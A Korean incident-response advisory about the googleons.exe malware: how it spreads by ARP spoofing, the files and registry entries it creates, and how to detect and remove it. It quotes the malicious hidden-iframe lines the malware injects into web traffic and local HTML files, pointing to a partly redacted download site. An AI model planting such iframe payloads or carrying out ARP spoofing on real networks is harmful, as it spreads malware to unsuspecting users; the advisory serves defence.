(1) 최근 국내에서 ARP Spoofing을 통해 감염되고,
감염 시 네트워크를 마비시키는 악성코드가 등장하여 주의가 필요함.
(2) 특히 네트워크 관리자는 내부 네트워크에서 ARP Spoofing 공격 여부를
주기적으로 탐지하고 공격 근원지를 파악하여
관련 악성코드가 실행 및 다운로드 되지 않도록 주의가 필요함.
2. 전파방법
(1) 최초 googleons.exe에 감염된 PC는 ARP Spoofing 공격
- 해당 악성코드 감염시 네트워크에 존재하는 호스트 및 게이트웨이를 대상으로
ARP Reply를 지속적으로 보냄.
- 게이트웨이의 MAC 주소와 공격대상 호스트의 MAC 주소를 위조하는 ARP Reply를
지속적으로 보냄.
(2) 감염된 PC와 동일 네트워크에 연결되어 있는 호스트들은
감염된 PC를 게이트웨이로 인식하게 하여 모든 패킷을 모니터링 및 변조할 수 있음.
- ARP Spoofing 공격으로 정상 호스트가 웹 접속 시 감염 PC는 패킷을 가로채고
아래와 같은 정보를 삽입해 악성코드 유포지 사이트로 유도.
"<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>"
(3) 악성코드 유포지 down.online[생략].net으로 유도된 PC중
아래와 같은 윈도우 취약점 패치가 안된 사이트는 googleons.exe에 감염됨.
- MS05-025
- MS06-014
- MS07-017
- MS07-027
3. 악성행위 (googleons.exe)
(1) 감염 PC와 동일 네트워크 대역 ARP Spoofing 공격.
(2) 동일 네트워크에 존재하는 PC들의 HTTP 통신 패킷 변조.
"<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>
</IFRAME P ?</IFRAME IFRAME " 삽입.
(3) USB를 통한 악성코드 전파.
(4) 감염 PC에 존재하는 .html, tml, asp, php, jsp 확장자에 아래와 같은 악성코드 삽입.
"<iframe src=http://down.online[생략].net/page/image/pd.htm height=0></iframe>
</IFRAME P ?</IFRAME IFRAME "
(5) 감염시 생성되는 파일
- C:\Document and Settings\[계정]\Local Settings\Temp
autoexec.bat (down.exe 최초 감염 악성코드, googleons.exe를 다운로드 및 실행)
googleons.exe
disocoo.exe (실행뒤 삭제)
npptools.dll
Packet.dll
WanPacket.dll
yahoons.exe (실행뒤 삭제)
- C:\windows\system32 (yahoons.exe 실행에 의해 생성되는 파일들)
dllhost32.exe
mh104.dll
moyu103.dll
mosou.exe
mydata.exe
nwizwmgjs.exe
nwizwmgjs.dll
nwizzhuxians.exe
nwizzhuxians.dll
RAV00xx.exe등 다수
(6) 부팅 후 재시작 할 수 있는 레지스트리에 등록.
- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 이름 : svc
- 파일 이름 : googleons.exe
4. 감염여부 확인 및 치료방법
(1) 감염여부 확인
- L3 또는 라우터에서 감염 PC 확인.
중복 MAC 주소 IP 확인 (악성코드 감염 IP 확인).
- ARP Spoofing 피해 PC에서 공격 PC 확인.
전체 네트워크 Ping 스캔.
중복 MAC 주소 IP 확인.
- 악성코드 감염 및 ARP Spoofing 공격 PC 확인.
C:\Document and Settings\[계정]\Local Settings\Temp\googleons.exe
존재여부 확인
googleons.exe 프로세스 실행여부 확인 [아래 치료방법 참조]
(2) 치료방법
- C:\Document and Settings\[계정]\Local Settings\Temp 하위 악성코드들 삭제.
- 윈도우 시스템 폴더에 존재하는 악성코드들 삭제.
- googleons.exe 프로세스 끝내기.
[Ctrl + Alt + Del] 클릭 후 프로세스 메뉴에서 googleons.exe 프로세스 종료.
- 레지스트리 삭제.
① googleons 재시작 레지스트리 삭제.
[시작] → [실행] 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
② 기타 악성코드 레지스트리 삭제.
[시작] → [실행] 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
5. 예방 방법
(1) 감염을 위한 사전 예방 방법
- 윈도 OS 최신 패치 실시.
※ 출처 : 인터넷 침해사고 대응지원센터